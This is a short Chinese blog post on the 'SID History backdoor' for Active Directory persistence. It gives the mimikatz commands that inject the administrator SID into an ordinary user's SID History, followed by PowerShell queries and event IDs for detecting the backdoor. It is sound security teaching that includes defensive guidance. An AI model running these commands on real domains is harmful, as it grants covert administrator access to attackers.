域内权限维持:SID History后门

01、简介

每个用户都有一个关联的安全标识符(SID),SID History的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。

02、利用方式

(1)使用域管理员权限查看test用户的SID History属性

PS C:\Users\Administrator> Import-Module ActiveDirectory
PS C:\Users\Administrator> Get-ADUser test -Properties sidhistory

(2)使用域管理员权限运行mimikatz,将administrator的SID添加到普通用户test的SID History属性中。

//提升权限
privilege::debug //修复NTDS服务 sid::patch //将高权限SID注入到地权限用户的SID History属性 sid::add
/sam:test /new:administrator

(3)重新查看test用户的SID History属性

(4)使用 test 用户登录域控服务器,可以看到已经拥有了管理员权限。

03、检测方法

(1)检测SID History后门的最佳方式就是枚举所有具体SID History属性的用户数据,找到用户的SIDHistory属性中的SID以“500”结尾的账号。

Get-ADUser -Filter "SIDHistory -like '*'" -Properties SIDHistory| ` Where { $_.SIDHistory -Like "*-500" }

(2) 每次更改用户对象时,都会生成4738的事件,监控SidHistory属性更改情况。另外,在windows日志里,没有找到4765和4766这两个事件,这里做个备注。(4765代表将 SID Histtory属性添加到用户的日志。4766代表将SID History属性添加到用户失败的日志。)

 

 

 

 

 

 

 参考连接:https://developer.aliyun.com/article/216878

posted @ 2023-01-29 10:11  Bypass  阅读(257)  评论(0编辑  收藏  举报